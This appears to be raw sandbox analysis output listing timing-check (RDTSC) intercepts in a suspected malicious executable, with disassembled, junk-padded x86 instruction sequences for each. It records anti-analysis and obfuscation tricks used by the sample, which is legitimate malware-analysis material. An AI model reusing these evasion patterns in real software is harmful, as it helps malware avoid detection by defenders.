Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15B2F6F second address: 15B3035 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 add dword ptr [esp], 7105D5FEh 0x0000000e jmp 00007FC7C1180B44h 0x00000013 push 00000003h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007FC7C1180B38h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f push 00000000h 0x00000031 or dword ptr [ebp+122D2D5Dh], ebx 0x00000037 push 00000003h 0x00000039 call 00007FC7C1180B41h 0x0000003e xor dword ptr [ebp+122D1832h], edx 0x00000044 pop edx 0x00000045 push A93D0D8Dh 0x0000004a jmp 00007FC7C1180B45h 0x0000004f xor dword ptr [esp], 693D0D8Dh 0x00000056 push 00000000h 0x00000058 push eax 0x00000059 call 00007FC7C1180B38h 0x0000005e pop eax 0x0000005f mov dword ptr [esp+04h], eax 0x00000063 add dword ptr [esp+04h], 00000016h 0x0000006b inc eax 0x0000006c push eax 0x0000006d ret 0x0000006e pop eax 0x0000006f ret 0x00000070 or dword ptr [ebp+122D17BAh], edi 0x00000076 lea ebx, dword ptr [ebp+124469E4h] 0x0000007c xor dword ptr [ebp+122D312Dh], eax 0x00000082 xchg eax, ebx 0x00000083 pushad 0x00000084 push eax 0x00000085 push edx 0x00000086 jl 00007FC7C1180B36h 0x0000008c rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15B3035 second address: 15B306F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA6743h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC7C0FA6748h 0x0000000e popad 0x0000000f push eax 0x00000010 jl 00007FC7C0FA673Eh 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15D288D second address: 15D2892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15A1F96 second address: 15A1FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C0FA6747h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15A1FB4 second address: 15A1FC9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FC7C1180B3Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15D0937 second address: 15D093F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15D0C0D second address: 15D0C29 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC7C1180B3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC7C1180B3Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15D0F00 second address: 15D0F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15D1361 second address: 15D1367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15D17BA second address: 15D17BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15D219A second address: 15D21AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B3Dh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15D2450 second address: 15D2465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C0FA6741h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15D6FD5 second address: 15D6FDF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC7C1180B36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15D6FDF second address: 15D6FE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15D759B second address: 15D759F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15D759F second address: 15D75A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15D75A5 second address: 15D75AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC7C1180B36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15D8845 second address: 15D884F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15D884F second address: 15D8855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DDE0B second address: 15DDE0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DDE0F second address: 15DDE15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DD5CD second address: 15DD5D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FC7C0FA6736h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DD9E7 second address: 15DD9F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jbe 00007FC7C1180B42h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DD9F9 second address: 15DD9FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DD9FF second address: 15DDA16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FC7C1180B41h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DDA16 second address: 15DDA35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC7C0FA6744h 0x0000000b push eax 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DE5CD second address: 15DE5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007FC7C1180B38h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DE5DE second address: 15DE5FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA673Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DE5FA second address: 15DE5FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DE5FF second address: 15DE611 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DE611 second address: 15DE628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FC7C1180B38h 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DE7AE second address: 15DE7DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7C0FA6749h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 jbe 00007FC7C0FA6736h 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DEA45 second address: 15DEA4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DEA4A second address: 15DEA68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA673Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007FC7C0FA6740h 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DECB5 second address: 15DECB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DECB9 second address: 15DECBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DF25A second address: 15DF277 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DF277 second address: 15DF2B9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC7C0FA673Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebx 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FC7C0FA6738h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D3020h], ebx 0x0000002d movzx esi, si 0x00000030 nop 0x00000031 push eax 0x00000032 push edx 0x00000033 push ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DF2B9 second address: 15DF2BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DF2BE second address: 15DF2F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA6743h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC7C0FA6748h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DF45B second address: 15DF473 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DF473 second address: 15DF489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C0FA6742h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DF489 second address: 15DF48D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DF48D second address: 15DF49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DF643 second address: 15DF647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DF87E second address: 15DF884 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DF884 second address: 15DF8AA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jns 00007FC7C1180B36h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov esi, 589A9ABDh 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC7C1180B3Fh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DF8AA second address: 15DF8CB instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC7C0FA6743h 0x00000008 jmp 00007FC7C0FA673Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 jnp 00007FC7C0FA673Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15DFE38 second address: 15DFE48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E17CC second address: 15E17D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E17D0 second address: 15E182E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D1B7Fh] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FC7C1180B38h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c or si, 61D9h 0x00000031 mov si, B600h 0x00000035 push 00000000h 0x00000037 or esi, dword ptr [ebp+122D34B6h] 0x0000003d jmp 00007FC7C1180B43h 0x00000042 xchg eax, ebx 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 jp 00007FC7C1180B36h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E182E second address: 15E1839 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E238B second address: 15E23CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FC7C1180B38h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov di, si 0x00000027 mov dword ptr [ebp+122D1DC9h], ecx 0x0000002d push 00000000h 0x0000002f movzx edi, di 0x00000032 push 00000000h 0x00000034 mov edi, esi 0x00000036 xchg eax, ebx 0x00000037 push ecx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E23CC second address: 15E23D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E23D0 second address: 15E23D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E23D4 second address: 15E23F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FC7C0FA673Dh 0x00000010 js 00007FC7C0FA6736h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E2DFE second address: 15E2EC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jng 00007FC7C1180B46h 0x00000012 jmp 00007FC7C1180B46h 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FC7C1180B38h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 movzx esi, ax 0x00000036 movsx edi, ax 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ebp 0x0000003e call 00007FC7C1180B38h 0x00000043 pop ebp 0x00000044 mov dword ptr [esp+04h], ebp 0x00000048 add dword ptr [esp+04h], 0000001Bh 0x00000050 inc ebp 0x00000051 push ebp 0x00000052 ret 0x00000053 pop ebp 0x00000054 ret 0x00000055 je 00007FC7C1180B3Bh 0x0000005b mov esi, 260E9858h 0x00000060 push 00000000h 0x00000062 call 00007FC7C1180B43h 0x00000067 or si, F917h 0x0000006c pop edi 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 jp 00007FC7C1180B38h 0x00000076 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E2EC1 second address: 15E2EC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E2EC7 second address: 15E2ECB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E42B7 second address: 15E42C1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC7C0FA673Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E4D72 second address: 15E4DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 nop 0x00000006 mov esi, 63DCC121h 0x0000000b push 00000000h 0x0000000d jmp 00007FC7C1180B42h 0x00000012 mov esi, dword ptr [ebp+122D1A01h] 0x00000018 push 00000000h 0x0000001a jc 00007FC7C1180B3Ah 0x00000020 mov si, 0E9Ch 0x00000024 xchg eax, ebx 0x00000025 pushad 0x00000026 jp 00007FC7C1180B38h 0x0000002c jnp 00007FC7C1180B38h 0x00000032 push ecx 0x00000033 pop ecx 0x00000034 popad 0x00000035 push eax 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E4DBC second address: 15E4DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15E6AF6 second address: 15E6AFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15A39B2 second address: 15A39C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007FC7C0FA673Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15EBE8D second address: 15EBE9F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC7C1180B38h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15EBE9F second address: 15EBF39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C0FA673Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d popad 0x0000000e nop 0x0000000f call 00007FC7C0FA673Ch 0x00000014 or dword ptr [ebp+122D1A11h], ecx 0x0000001a pop edi 0x0000001b push dword ptr fs:[00000000h] 0x00000022 mov dword ptr [ebp+1246DA5Eh], ebx 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f xor dword ptr [ebp+122D3354h], edx 0x00000035 mov eax, dword ptr [ebp+122D0CE5h] 0x0000003b mov bx, 164Bh 0x0000003f push FFFFFFFFh 0x00000041 push 00000000h 0x00000043 push edx 0x00000044 call 00007FC7C0FA6738h 0x00000049 pop edx 0x0000004a mov dword ptr [esp+04h], edx 0x0000004e add dword ptr [esp+04h], 0000001Ah 0x00000056 inc edx 0x00000057 push edx 0x00000058 ret 0x00000059 pop edx 0x0000005a ret 0x0000005b jmp 00007FC7C0FA6747h 0x00000060 push eax 0x00000061 push ecx 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007FC7C0FA673Bh 0x00000069 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15ECFA3 second address: 15ECFC3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FC7C1180B42h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15EDE12 second address: 15EDE20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FC7C0FA6736h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15EDE20 second address: 15EDE24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15EDE24 second address: 15EDECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FC7C0FA6738h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D36CDh] 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007FC7C0FA6738h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 push 00000000h 0x00000048 call 00007FC7C0FA6748h 0x0000004d jng 00007FC7C0FA673Ch 0x00000053 or dword ptr [ebp+122D1C3Bh], ecx 0x00000059 pop ebx 0x0000005a xchg eax, esi 0x0000005b jmp 00007FC7C0FA6749h 0x00000060 push eax 0x00000061 push ebx 0x00000062 pushad 0x00000063 jmp 00007FC7C0FA673Eh 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F1E0B second address: 15F1E10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F0178 second address: 15F017C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 15F017C second address: 15F0180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
